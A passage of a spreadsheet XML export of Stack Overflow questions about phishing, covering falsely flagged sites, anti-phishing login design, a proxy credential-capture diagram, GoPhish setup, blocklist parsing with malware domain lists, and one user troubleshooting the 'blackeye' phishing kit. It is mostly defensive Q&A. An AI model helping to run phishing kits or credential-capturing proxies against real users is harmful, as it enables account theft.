 &amp;quot;client_email&amp;quot;: &amp;quot;XXXXXXX&amp;quot;
 &amp;quot;client_id&amp;quot;: &amp;quot;XXXXXXXXXX&amp;quot;
 &amp;quot;auth_uri&amp;quot;: &amp;quot;https://acc&amp;quot;
 &amp;quot;token_uri&amp;quot;: &amp;quot;https://oa&amp;quot;
 &amp;quot;auth_provider_x509_cert_url: &amp;quot;XXX&amp;quot;
 &amp;quot;client_x509_cert_url&amp;quot;: &amp;quot;XXX&amp;quot;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;authentication&gt;</t>
  </si>
  <si>
    <t>Site marked as deceptive for Phishing, even when it is not</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a social media site made with Next.js Typescript and Sanity CMS, which has been marked as deceptive site by google. When I searched for the sample URLs in the google search console, I found that those pages marked dangerous were the authentication ones readymade by Nextauth.js . Those pages are necessary for authentication of users and contain no malware or leaking information. How can I fix it?&lt;/p&gt;
 &lt;p&gt;The deceptive sample url shown are:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;https://[&lt;em&gt;mywebsite.vercel.app&lt;/em&gt;]/api/auth/callback/google&lt;/li&gt;
 &lt;li&gt;https://[&lt;em&gt;mywebsite.vercel.app&lt;/em&gt;]/api/auth/signin/?error=OAuthCallback&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;node.js&gt;&lt;security&gt;&lt;next.js&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Phishing attack ahead (in Chrome) - my domain got blacklisted, how to get it normal back?</t>
  </si>
  <si>
    <t>&lt;p&gt;Here's what Chrome shows after the programmer was messing around with php script and web site testing and tweaking something.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Phishing attack ahead
 Attackers on packandsell.today might try to trick you to steal your information (for example, passwords, messages, or credit cards).&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Can you help me please to find a procedure that can get my domain status to normal?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google-chrome&gt;&lt;restore&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Interacting with Internet Explorer's blacklist</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a list of 100,000 domains and I need to identify which ones are blocked by IE for phishing, malware, etc. Are there any applications that interact with IE or solutions that can help me solve this problem?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;internet-explorer&gt;&lt;dns&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Avoiding phishing warnings when duplicate content is legitimate</t>
  </si>
  <si>
    <t>&lt;p&gt;The situation we have is that two sites are running simultaneously in an A/B test with the new site likely to completely replace the old once we have learned what need to from the A/B test.&lt;/p&gt;
 &lt;p&gt;The subject matter of the site includes content on a page that talks about a bank. This page exists on the old site and has been copied across to the new site so the user can find the info out regardless of the site they are on.&lt;/p&gt;
 &lt;p&gt;The problem is that Google Chrome has flagged this as a phishing page, i.e. it has noticed the very similar content, noticed the subject matter and, quite reasonably, come to the conclusion that the new page is an attempt to deceive users.&lt;/p&gt;
 &lt;p&gt;How can we solve this problem so that users of either site do not see a phishing warning?&lt;/p&gt;
 &lt;p&gt;As a front end dev I have only a small amount of knowledge of server side things, the comment mentions dkim and SPF records, I've tried neither.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;google-chrome&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Best practices for login pages?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am working on a single sign-on login page using &lt;a href="http://en.wikipedia.org/wiki/Shibboleth_(Internet2)" rel="noreferrer"&gt;Shibboleth&lt;/a&gt; that will be used for a variety of web applications. Obviously we would like to make this page as secure and usable as possible while limiting the effects of phishing scams.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;What are the best practices to keep in mind when designing a login page?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Some questions that have come up around this issue:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Is it important for the login page to always look the same on every display?&lt;/li&gt;
 &lt;li&gt;Conversely, would it be beneficial for the login page to have a random design?&lt;/li&gt;
 &lt;li&gt;Is it better for the login page to look the same as all of your other pages or should it have its own unique design?&lt;/li&gt;
 &lt;li&gt;If the login page has its own unique design, should it incorporate other constant elements from your site's design (such as global navigation)?&lt;/li&gt;
 &lt;li&gt;Is the login page an appropriate place to provide the user with additional content (such as latest news)?&lt;/li&gt;
 &lt;li&gt;Are there any additional security features that should be included to help keep people safe?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>Joe Lencioni</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;authentication&gt;&lt;usability&gt;&lt;shibboleth&gt;</t>
  </si>
  <si>
    <t>Get original email headers of forwarded email using domain-wide-delegation</t>
  </si>
  <si>
    <t>&lt;p&gt;We have all spam and phishing emails being forwarded to an IT department for review. We currently have individuals downloading the original email in their gmail inbox and then attaching it to an email to the spam box. This has caused a lot of complaints from less technical users. &lt;/p&gt;
 &lt;p&gt;I am trying to build a python script that can read forwarded emails and then use domain wide delegation to access their email boxes and retrieve the original headers of the forwarded message. &lt;/p&gt;
 &lt;p&gt;Do any of the fields in the gmail headers stay constant when forwarding an email so that a forwarded email can be used to query the original email in a users inbox ? &lt;/p&gt;
 &lt;p&gt;The current method that I have tried reads the message ID's of the spam box, retrieves the message, identifies the sender and messageID's of the messages in the spam box and then uses domain-wide-delegation to query the mailbox of the sender for the original message. This fails however as Gmail messageID's and threadID's of the forwarded emails don't match the original email. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python-3.x&gt;&lt;gmail-api&gt;&lt;service-accounts&gt;</t>
  </si>
  <si>
    <t>email send with php identified as phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;I've git a problem with an registration script of my login.&lt;/p&gt;
 &lt;p&gt;This script handles the registration information of the user and saves them.
 Additional an email is send to this person, in order to verify his emailaddress.&lt;/p&gt;
 &lt;p&gt;The problem is that this email is markes as a phishing email by thunderbird.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; //send verify email
  $sender = "test@example.de";
  $empfaenger = $email;
  $betreff = "Welcome";
  $mailtext = "Thank you for your registration.
  Please go to &amp;lt;a href=\"http://validatingsite.de\"&amp;gt;this site&amp;lt;/a&amp;gt; and enter your 
  activationcode in order to verify your email-address";
  mail($empfaenger, $betreff, $mailtext, "From: $sender\n" . "Content-Type:
  text/html; charset=iso-8859-1\n")
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;If I delete the link &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;a&amp;gt; href=\"http://validatingsite.de\"&amp;gt;this site&amp;lt;/a&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;the email is not marked and everything is okay.&lt;/p&gt;
 &lt;p&gt;Anybody an idea how to solve my problem?
 Do I add the link correctly in the email?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;html&gt;&lt;thunderbird&gt;</t>
  </si>
  <si>
    <t>Is it possible for using imap to modify the message of email?</t>
  </si>
  <si>
    <t>&lt;p&gt;is it possible to add a pop-up message on the received email?&lt;/p&gt;
 &lt;p&gt;I have searched IMAP but it can only fetch the email, view the email content.
 and I have considered milter, but it only uses for filtering.
 My idea is when there is a URL in the context of email, I could show a warning message to tell the users that it is a phishing URL or not.
 I would like to make the warning message is available for no matter what email client I am using. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;imap&gt;&lt;phishing&gt;&lt;milter&gt;</t>
  </si>
  <si>
    <t>Can I trust Git Credential Manager by GitCredentialManager?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've used Github desktop for a couple of years. Today it will suddenly would not log in to my account, although I have not changed password lately. When I click login with browser I'm taken to a page that says &amp;quot;Git Credential Manager by GitCredentialManager wants to access your account&amp;quot; and that I should authorize full read and write access.&lt;/p&gt;
 &lt;p&gt;Googling this has not given me any clues to why this would suddenly happen. Do I have to start using this service to login to Github desktop or could this be a phishing attempt?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;github&gt;&lt;credentials&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to protect login form from being proxied and used in phishing attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;asking here because I can't find exactly what I am looking for. I looked at several OWASP pages, searched using terms like &amp;quot;login proxy phishing&amp;quot;, &amp;quot;login csrf attack&amp;quot; and the likes and found no useful information how to protect this kind of scenario.&lt;/p&gt;
 &lt;p&gt;Let's say you have your trusted site (T), a malicious site (M), and the user who has an account at trusted site (U).&lt;/p&gt;
 &lt;p&gt;M sends a malicious email to the user, pretending to be T. User clicks the link and is redirected to M. Now, M is acting as a proxy to your trusted site and scrapes the login page -- the form, the CSRF token if any, is there. But the form's action has been manipulated to POST to M instead of T -- allowing the malicious actor to capture the credentials, before forwarding the login request, and giving to the user T's response (redirect).&lt;/p&gt;
 &lt;p&gt;Here's the sequence diagram of the attack i'm trying to prevent:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; USER MALCIOUS TRUSTED
  | | |
  | access site &amp;gt; | |
  +-----------------------&amp;gt;| scrape login form &amp;gt; |
  | +-----------------------&amp;gt;|
  | | &amp;lt; give form |
  | &amp;lt; give modified form |&amp;lt;-----------------------+
  |&amp;lt;-----------------------+ |
  | login &amp;gt; | |
  +-----------------------&amp;gt;| capture credentials |
  | | and forward login &amp;gt; |
  | +-----------------------&amp;gt;|
  | | |
  | | &amp;lt; login success |
  | | &amp;lt; 301 to /home |
  | |&amp;lt;-----------------------|
  | &amp;lt; redirect to | | 
  | &amp;lt; trusted.com/home | |
  |&amp;lt;-----------------------+ |
  | | |
  | (phished!) |
  | |
  | |
  | access site normally &amp;gt; |
  +------------------------------------------------&amp;gt;|
  | |
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Is this actually preventable? I have a gut feeling that CSRF will not help here because the token can be easily scraped and passed back to T and it will pass. Let me know if I'm wrong.&lt;/p&gt;
 &lt;p&gt;I also think that POSTing the login using ajax will not work because the attacker can proxy everything, including assets, and modify them before serving to the victim -- and make the browser post the ajax form to the malicious site (bypassing XSS). M can then fake an XHR call using curl to forward the request to T.&lt;/p&gt;
 &lt;p&gt;I am sure this has already been thought of and solved by the experts, but english not being my first language is giving me difficulty in finding the right resources.&lt;/p&gt;
 &lt;p&gt;What are the keywords that I need to know in order to prevent this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;xss&gt;&lt;csrf&gt;&lt;owasp&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What are the best ways to prevent your website from being Phished?</t>
  </si>
  <si>
    <t>&lt;p&gt;What are the best ways to prevent your website from being Phished? Please cite some technical suggestions and references if possible.&lt;/p&gt;
 &lt;p&gt;Thank you!&lt;/p&gt;</t>
  </si>
  <si>
    <t>Question Regarding "Localhost says...." alert box</t>
  </si>
  <si>
    <t>&lt;p&gt;Quick question, in our web application when I navigate to a page I get the "Localhost says:....." I understand it is a security/anti-phishing feature, however it only occurs on one page and not the others. What would cause the security popup for one page and not the other pages? Is it a browser setting?&lt;/p&gt;
 &lt;p&gt;Thanks,
 Shaun&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;asp.net&gt;&lt;webforms&gt;</t>
  </si>
  <si>
    <t>DNS - unauthorized subdomain</t>
  </si>
  <si>
    <t>&lt;p&gt;So I thought I understood DNS pretty well, but I'm stumped as to how someone could establish a subdomain on my domain that actually resolves. &lt;/p&gt;
 &lt;p&gt;A few key facts:&lt;/p&gt;
 &lt;p&gt;I run a personal site (call it myname.net) on a server at home. I use afraid.org as the dynamic DNS provider. &lt;/p&gt;
 &lt;p&gt;I got an email saying someone is running a phishing site, and provided the url (call it badguy.myname.net/stuff/)&lt;/p&gt;
 &lt;p&gt;When I type that url into my browser, it actually resolves and displays a Chinese bank impersonated site. However, it's not actually running on my server - the IP seems to be located in Hong Kong. &lt;/p&gt;
 &lt;p&gt;I checked out afraid.org and still only see two entries for my domain; www.myname.net and myname.net. I thought all DNS requests for my domain would resolve to my server, and then any subdomains would be worked out internally by me as the domain admin.&lt;/p&gt;
 &lt;p&gt;Can anyone shed some light on what I'm missing? I suspect I'm missing a DNS record or something, maybe *.myname.net as a catch-all to force all requests to me? Any input is appreciated. &lt;/p&gt;
 &lt;p&gt;solved - this issue has been discovered by others:
 &lt;a href="https://serverfault.com/questions/427262/phishing-site-uses-subdomain-that-i-never-registered"&gt;https://serverfault.com/questions/427262/phishing-site-uses-subdomain-that-i-never-registered&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;apache&gt;&lt;dns&gt;&lt;subdomain&gt;</t>
  </si>
  <si>
    <t>Ngrok not working after add the auth token and doing all the steps -blackeye</t>
  </si>
  <si>
    <t>&lt;p&gt;Ngrok not working in blackeye :(&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/Y54Yy.png" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/Dg0Ty.png" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ngrok&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Sketchy CDATA code written in Python's byte format</t>
  </si>
  <si>
    <t>&lt;p&gt;People of StackOverflow, what do these things do? Excuse me for having such little knowledge of Python.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;source (please use line wrap):&lt;/strong&gt; view-source:clipfull.github.io (phishing site's source code)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;python&gt;&lt;cdata&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Extract FQDNS from a text file using python</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to create a python script that downloads text files from a list of URLs and then concatenates them into a single file. This is what I have:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;import urllib
 import urllib.request
 import re
 with open(&amp;quot;blocklist_urls.txt&amp;quot;, &amp;quot;r&amp;quot;) as a:
  urls = a.readlines()
 retrieved_pages = []
 for url in urls:
  retrieved_pages.append(urllib.request.urlopen(url).read())
 with open('blocklist_raw.txt', 'w') as f:
  for page in retrieved_pages:
  sys.stdout = f
  decoded_line = page.decode(&amp;quot;utf-8&amp;quot;)
  print(decoded_line)
  sys.stdout = original_stdout
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;and it does grab text files from all of the URLs I listed in my text file without error. It creates blocklist_raw.txt and it contains several blocklists formatted in such a way:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;# AdAway default blocklist
 # Blocking mobile ad providers and some analytics providers
 #
 # Project home page:
 # https://github.com/AdAway/adaway.github.io/
 #
 # Fetch the latest version of this file:
 # https://raw.githubusercontent.com/AdAway/adaway.github.io/master/hosts.txt
 #
 # License:
 # CC Attribution 3.0 (http://creativecommons.org/licenses/by/3.0/)
 #
 # Contributions by:
 # Kicelo, Dominik Schuermann.
 # Further changes and contributors maintained in the commit history at
 # https://github.com/AdAway/adaway.github.io/commits/master
 #
 # Contribute:
 # Create an issue at https://github.com/AdAway/adaway.github.io/issues
 #
 # [163.com]
 127.0.0.1 analytics.163.com
 127.0.0.1 crash.163.com
 127.0.0.1 crashlytics.163.com
 127.0.0.1 iad.g.163.com
 # [1mobile.com]
 127.0.0.1 ads.1mobile.com
 127.0.0.1 api4.1mobile.com
 # [1rx.io]
 127.0.0.1 sync.1rx.io
 127.0.0.1 tag.1rx.io
 # [206ads.com]
 127.0.0.1 s.206ads.com
 # [247-inc.net]
 127.0.0.1 api.247-inc.net
 127.0.0.1 tie.247-inc.net
 nav.booksonlineclub.com
 navi.businessconsults.net
 navi.earthsolution.org
 nci.bigdepression.net
 nci.dnsweb.org
 nci.safalife.com
 ncih.dnsweb.org
 ncsc.businessconsults.net
 ne.hugesoft.org
 nes.nationtour.net
 net.firefoxupdata.com
 net.infosupports.com
 new.arrowservice.net
 new.booksonlineclub.com
 new.firefoxupdata.com
 new.globalowa.com
 newport.bigdepression.net
 newport.infosupports.com
 newport.safalife.com
 news.advanbusiness.com
 news.aoldaily.com
 news.aolon1ine.com
 # Oldest record: 2021-09-03T02:06:30+02:00
 # Number of source websites: 873
 # Number of source subdomains: 1990306
 # Number of source DNS records: ~2E9 + 1298142
 #
 # Input rules: asns: 6, zones: 48
 # Subsequent rules: asns: 6, hostnames: 122196, ip4s: 64, zones: 48
 # ‚Ä¶ no duplicates: asns: 6, hostnames: 89794, zones: 48
 # Output rules: hostnames: 122196
 #
 0.0.0.0 0001.ya-man.com
 0.0.0.0 0002.onlyminerals.jp
 0.0.0.0 000.affex.org
 # Title: NoTrack Malware Blocklist
 # Description: Domains classified as malware, phishing or adware
 # Author: QuidsUp
 # License: GNU General Public License v3.0
 # Home: https://quidsup.net/notrack/blocklist.php
 # @ GitLab : https://gitlab.com/quidsup/notrack-blocklists
 # Updated: 08 Sep 2021
 #LatestVersion 21.08
 # Domain Count: 348
 #===============================================================
 2track.info #Adware - Malware
 4dsply.com #Adware - Malware
 acountscr.cool #Adware Lnkr - Malware
 ad2up.com #Adware - Malware
 adaranth.com #Adware - Malware
 adbigline.network #Malware - Malware
 addr.cx #Adware Lnkr - Malware
 adfuture.cn #Android Trojan - Malware
 adsunflower.com #Android Trojan - Malware
 adultsonly.pro #Generic - Malware
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Is there a way that I can only keep the FQDN's from the blocklist_raw.txt and remove all other text? Any point in the right direction is appreciated. Thank you.&lt;/p&gt;
 &lt;p&gt;EDIT: This is what I have thus far. I have never written python before, so a lot of this may not make a whole bunch of sense:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;#!/usr/bin/env python3
 import urllib
 import urllib.request
 import re
 import sys
 original_stdout = sys.stdout
 def removeStr(val):
  if val.count('.') &amp;gt;= 2:
  if val.count('/') &amp;lt;= 0:
  return val
 with open(&amp;quot;blocklist_urls.txt&amp;quot;, &amp;quot;r&amp;quot;) as a:
  urls = a.readlines()
 retrieved_pages = []
 for url in urls:
  retrieved_pages.append(urllib.request.urlopen(url).read())
 for page in retrieved_pages:
  decoded_line = page.decode(&amp;quot;utf-8&amp;quot;)
 each_line = &amp;quot;\n&amp;quot;.join(filter(removeStr, decoded_line.split()))
 urls_filtered_raw = each_line.replace('0.0.0.0', '\b').replace('127.0.0.1', '\b')
 with open('blocklist_raw.txt', 'w') as b:
  for page in retrieved_pages:
  sys.stdout = b
  print(urls_filtered_raw.rstrip(&amp;quot;\n&amp;quot;).rstrip(&amp;quot;^H&amp;quot;))
  sys.stdout = original_stdout
 links = set()
 with open('blocklist_raw.txt', 'r') as fp:
  for line in fp.readlines():
  links.add(line)
 with open('blocklist_raw.txt', 'w') as fp:
  for line in links:
  fp.write(line)
 sorted_urls_raw = open('blocklist_raw.txt', 'r')
 sorted_urls_list = sorted_urls_raw.readlines
 split_hosts = []
 for h in sorted_urls_raw:
  segments = h.split('.')
  segments.reverse()
  split_hosts.append(segments)
 split_hosts.sort()
 for segments in split_hosts:
  segments.reverse()
  print(&amp;quot;.&amp;quot;.join(segments))
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I'm trying to find a way to sort the output in alphabetical order and write the output back to file. Thanks guys.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Python email header extractor</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a simple piece of code with will look at a email header and pull out the date, from, to and subject of the email header. To do this i must put the email header into a .txt document in order for the code to read the header. &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;from email.parser import BytesHeaderParser
 from glob import glob
 import csv
 fields = ['Date', 'From', 'To', 'Subject']
 out = csv.writer(open('output.csv', 'w'))
 out.writerow(["File name"]+fields)
 parser = BytesHeaderParser()
 for name in glob('*.msg'):
 with open(name, 'rb') as fd:
 msg = parser.parse(fd)
 out.writerow([name]+[msg[f] for f in fields])
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I want to be able to do this in a mass amount, so when dealing with large amounts of emails from the same 'phishing campaign' i can put all the .msg into one folder and run the script to extract the data i need. &lt;/p&gt;
 &lt;p&gt;Is this possible also willing to do the code in powershell.&lt;/p&gt;
 &lt;p&gt;Thanks. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;powershell&gt;&lt;email-spam&gt;&lt;phishing&gt;&lt;mass-emails&gt;</t>
  </si>
  <si>
    <t>How to implement Yahoo/Facebook like client computer specific Sing-in seal to secure clients from phishing attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;We want to implement sign in seal to reduce risk of phishing attacks on client. We want client to know that he is on our site rather than some replica of our site. Some web search got us example of Yahoo Sign-in-seal feature. Can you guys guide me on implementing such a system?&lt;/p&gt;
 &lt;p&gt;Details I would like to have suggestions on are specifically database design and whether mechanism will work with cookies or something else, and are there beter solutions for our requirement than Yahoo sign-in seal.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;mysql&gt;&lt;database-design&gt;&lt;session-cookies&gt;&lt;yahoo&gt;</t>
  </si>
  <si>
    <t>"docker run" requires at least 1 argument</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm trying to run this Docker command related to GoPhish&lt;/p&gt;
 &lt;pre class="lang-bash prettyprint-override"&gt;&lt;code&gt;$ docker run -d --restart always -p 8080:8080 -p 8443:8443 --name web_server -v ${HOME}/Docker/Gophish/apache:/opt/bitnami/apache2/htdocs/bitnami/apache:latest
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I also tried to use docker container run but it's not working.&lt;/p&gt;
 &lt;p&gt;but it's showing this issue :&lt;/p&gt;
 &lt;pre class="lang-bash prettyprint-override"&gt;&lt;code&gt;&amp;quot;docker run&amp;quot; requires at least 1 argument.
 See 'docker run --help'.
 Usage: docker run [OPTIONS] IMAGE [COMMAND] [ARG...]
 Run a command in a new container
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;docker&gt;&lt;gophish&gt;</t>
  </si>
  <si>
    <t>Phishing And CSS position:absolute</t>
  </si>
  <si>
    <t>&lt;p&gt;How CSS &lt;code&gt;position:absolute&lt;/code&gt; rule actually helps phishing? &lt;/p&gt;
 &lt;p&gt;Can someone help me out, I'm confused :(&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;css&gt;&lt;position&gt;&lt;absolute&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to call Phishtank API to get JSON response?</t>
  </si>
  <si>
    <t>&lt;p&gt;It was really painful to find how to call Phishtank API &lt;a href="https://www.phishtank.com/api_info.php" rel="nofollow noreferrer"&gt;here&lt;/a&gt;.
 After a lot of searching I was able to find how to call the API. Below is a sample call,&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://checkurl.phishtank.com/checkurl/index.php?url=http://auto.smtpsystems.net/&amp;amp;format=json" rel="nofollow noreferrer"&gt;https://checkurl.phishtank.com/checkurl/index.php?url=http://auto.smtpsystems.net/&amp;amp;format=json&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;But the problem with the above call is that it gives the response in XML format whereas I want the response in JSON format.&lt;/p&gt;
 &lt;p&gt;Any kind of help will be greatly appreciated. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;api&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Browsers incorrectly flag my intranet sites as phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;I have several (not only) web services running on my local network, like TrueNas, jellyfin, pihole, home assistant, etc.&lt;/p&gt;
 &lt;p&gt;Some are accessible from outside (I have a static public IP and port forwarding is set up). I also have DNS (several subdomains, like pihole.xxxx.xx pointing to my public IP) and HTTPS certificates set up for access.&lt;/p&gt;
 &lt;p&gt;At the same time, I also set up DNS, which runs locally, so that when someone tries to access the services from the LAN, the domain name is translated directly to the local IP (in my case 192.168.7.X), and that the services can be accessed by domain name even in the event of an Internet outage.&lt;/p&gt;
 &lt;p&gt;The problem is that with this setting, browsers (chrome and Firefox) consider the sites to be phishing. I assume that because the translated IP (192.168.7.X) doesn't match the one it knows about (my public IP), it thinks the page has been spoofed.&lt;/p&gt;
 &lt;p&gt;I want to find a way to get rid of this warning.&lt;/p&gt;
 &lt;p&gt;Ideally by some configuration change on the network (so that I don't have to configure each client browser) that would ensure the same access but wouldn't be considered problematic.&lt;/p&gt;
 &lt;p&gt;But if there is no such solution, I will also configure each client.&lt;/p&gt;
 &lt;p&gt;The only solution I have found so far is to disable protection in the browser completely, but I don't want to do that in the long term.&lt;/p&gt;
 &lt;p&gt;I'm also tried to report the incorrect alert to Google, but with no feedback.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;firefox&gt;&lt;browser&gt;&lt;intranet&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Exporting data from outlook to excel with parsing</t>
  </si>
  <si>
    <t>&lt;p&gt;I receive a form in email that looks as follows.&lt;/p&gt;
 &lt;p&gt;The submitted details are below:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Region Europe
 Country Spain
 Contactable by email no
 Contactable by phone no
 Title MR
 First name John
 Last name Doe
 Email j.doe@doe.com
 Contact number 1234567
 Role Customer
 Institution companyname ltd
 Product TEST product
 Message 
 TEST Question 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I need to extract some of the fields into the Excel Workbook. &lt;/p&gt;
 &lt;p&gt;I have been entering those emails manually so I need to find a code to extract data into next empty row.&lt;/p&gt;
 &lt;p&gt;My Excel headers look like this&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/DEXIx.jpg" rel="nofollow noreferrer"&gt;Excel columns&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/GqNSD.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/GqNSD.jpg" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I have checked some of the answers here and I managed to put together a code but it doesn't seem to work as needed. &lt;/p&gt;
 &lt;p&gt;Here what I have so far. &lt;/p&gt;
 &lt;p&gt;I entered it into Outlook VBA module.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Sub Extract()
  Dim myOlApp As Outlook.Application
  Dim myNameSpace As Outlook.NameSpace
  Dim topOlFolder As Outlook.MAPIFolder
  Dim myOlFolder As Outlook.Folder
  Dim myOlMailItem As Outlook.MailItem
  Set myNameSpace = Outlook.Application.GetNamespace("mapi")
  Set objItem = objApp.ActiveExplorer.Selection.Item(1)
  Dim xlObj As worksheet
  Set xlObj = ActiveSheet 
  Dim anchor As Range
  Set anchor = xlObj.Range("b2") 
  anchor.Offset(0, 0).Value = "Country" 
  anchor.Offset(0, 1).Value = "Role" 
  anchor.Offset(0, 2).Value = "Product"
  anchor.Offset(0, 3).Value = "Message"
  anchor.Offset(0, 4).Value = "Sender"
  Dim msgText As String
  Dim msgLine() As String
  Dim messageArray() As String
  i = 0 
  For Each myOlMailItem In myOlFolder.Items
  i = i + 1 
  msgText = myOlMailItem.Body 
  messageArray = Split(msgText, vbCrLf) 
  For j = 0 To UBound(messageArray)
  msgLine = Split(messageArray(j) &amp;amp; ":", ":") 
  Select Case Left(msgLine(0), 6) 
  Case "Countr"
  anchor.Offset(i, 0).Value = msgLine(1) 
  Case "Role"
  anchor.Offset(i, 1).Value = messageArray(j + 1) 
  Case "Product"
  anchor.Offset(i, 2).Value = messageArray(j + 1) 
  Case "Message"
  anchor.Offset(i, 3).Value = msgLine(1) 
  End Select
  anchor.Offset(i, 4).Value = myOlMailItem.SenderName
  anchor.Offset(i, -1).Value = i 
  Next
  Next
 End Sub
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I would really appreciate your help and comments.&lt;/p&gt;
 &lt;p&gt;Edit:&lt;/p&gt;
 &lt;p&gt;I have run the diagnostics tool and this is how email body looks like:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; |Message ‚Äπ2 crlf‚Ä∫|
  |TEST question - please confirm receipt if received. ‚Äπ2 crlf‚Ä∫|
  |AAA-BBB-001366 ‚Äπ2 crlf‚Ä∫|
  |JAN 2020 ‚Äπ2 crlf‚Ä∫|
  | ‚Äπ2 crlf‚Ä∫|
  |info.com &amp;lt;http://info.com/?mc_phishing_protection_id=xxxbpg|
  |db3lse2ip1c6bc0n0&amp;gt;‚Äπ2 s‚Ä∫‚Äπ2 crlf‚Ä∫|
  | ‚Äπ2 crlf‚Ä∫|
  | ‚Äπ3 crlf‚Ä∫|
  |This email (including any attachment) is intended only for the use by the recipients named above and|
  | contains proprietary information that may be confidential, copyrighted and/or privileged. Unauthori|
  |zed disclosure, use or copying is prohibited. If this email was sent to you in error or if you are n|
  |ot an intended recipient, please notify the sender immediately and delete this e-mail from your syst|
  |ems. Thank you‚Äπcrlf‚Ä∫|
 Html: |&amp;lt;html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmln|
  |s:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omm|
  |l" xmlns="http://www.w3.org/TR/REC-html40"&amp;gt;&amp;lt;head&amp;gt;‚Äπ2 crlf‚Ä∫|
  |&amp;lt;meta name="Generator" content="Microsoft Word 15 (filtered medium)"&amp;gt;‚Äπcrlf‚Ä∫|
  |&amp;lt;title&amp;gt;Simple Transactional Email&amp;lt;/title&amp;gt;‚Äπcrlf‚Ä∫|
